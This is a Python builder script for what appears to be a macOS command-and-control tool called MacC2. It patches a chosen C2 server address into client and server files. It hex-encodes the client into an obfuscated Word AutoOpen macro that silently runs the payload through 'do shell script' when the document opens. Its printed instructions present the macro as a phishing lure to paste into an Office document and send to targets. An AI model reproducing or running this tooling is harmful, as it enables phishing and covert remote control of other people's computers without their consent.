import optparse
from optparse import OptionParser
import sys
import base64
import binascii
import os
import random
from random import randrange

if ((len(sys.argv) < 5 or len(sys.argv) > 5) and '-h' not in sys.argv):
    print("Usage: %s -s <C2 Server IP/domain> -p <C2 Server Port>" % sys.argv[0])
    sys.exit(1)

parser = OptionParser()
parser.add_option("-s", "--server", help="C2 server IP address")
parser.add_option("-p", "--port", help="C2 server port")
(options, args) = parser.parse_args()

host = options.server
port = options.port

f1 = open('server.py','r')
f2 = open('MacC2_server.py','w')

for line in f1:
    f2.write(line.replace('127.0.0.1', host).replace('443', port))

f1.close()
f2.close()

f3 = open('client.py','r')
f4 = open('MacC2_client.py', 'w')

for line in f3:
    f4.write(line.replace('127.0.0.1', host).replace('443', port))

f3.close()
f4.close()

with open('MacC2_client.py', 'r') as file:
    data = file.read()

data2 = binascii.hexlify(data.encode('utf-8'))
#data2 = base64.b64encode(data.encode('utf-8'))
#data3 = data2.decode('utf8')

macrofile = open('macro.txt', 'w')
macrofile.write('Sub AutoOpen()\n')
macrofile.write("a = \"p\" + \"yt\" + \"h\" + \"on\"\n")
macrofile.write("b = \"ex\" + \"e\" + \"c\"\n")
macrofile.write("")

initializer = 0
totallength = len(data2)
chars = 'abcdef'
varname = ''.join(random.choices(chars, k=8))
rowcount = randrange(40,60)
while totallength > 0:
    if initializer == 0:
        int1 = rowcount*initializer
        int2 = rowcount + int1
        text2 = data2[int1:int2].decode('utf8')
        macrofile.write("%s = \"%s\"\n" % (varname,text2))
        totallength = totallength - rowcount
        initializer = initializer + 1
    else:
        int3 = rowcount*initializer
        int4 = rowcount + int3
        text3 = data2[int3:int4].decode('utf8')
        macrofile.write("%s = %s + \"%s\"\n" % (varname,varname,text3))
        totallength = totallength - rowcount
        initializer = initializer + 1
 
macro = "MacScript (\"do shell script \"\"\" & a & \" -c \\\"\"import base64,binascii,sys,socket,commands,os,ssl;\" & b & \"(binascii.unhexlify({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('\" & %s & \"')))\\\"\" &> /dev/null \"\"\")\n" % varname
#macro = "MacScript (\"do shell script \"\"\" & a & \" -c \\\"\"import base64,sys,socket,commands,os,ssl;\" & b & \"(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('\" & info & \"')))\\\"\" &> /dev/null \"\"\")\n"
macrofile.write(macro)
macrofile.write("End Sub\n")
macrofile.close()

print("-"*100)
print("==>Start MacC2_server.py and then upload MacC2_client.py (or whatever you want to rename it) to your target macOS device and execute.")
print("==>Or you can use the macro generated by this script as a phishing lure (macro-enabled MS Office doc):")
print("Paste the macro code from macro.txt into your macro-enabled Office doc as a macro and send!")
print("[-] Note: When access is gained through the macro-enabled Word doc, some MacC2 functions may not work due to sandboxing.")

print("Happy hunting!")
print('')
print("Macro was written to macro.txt in the current working directory")

print("DONE!")
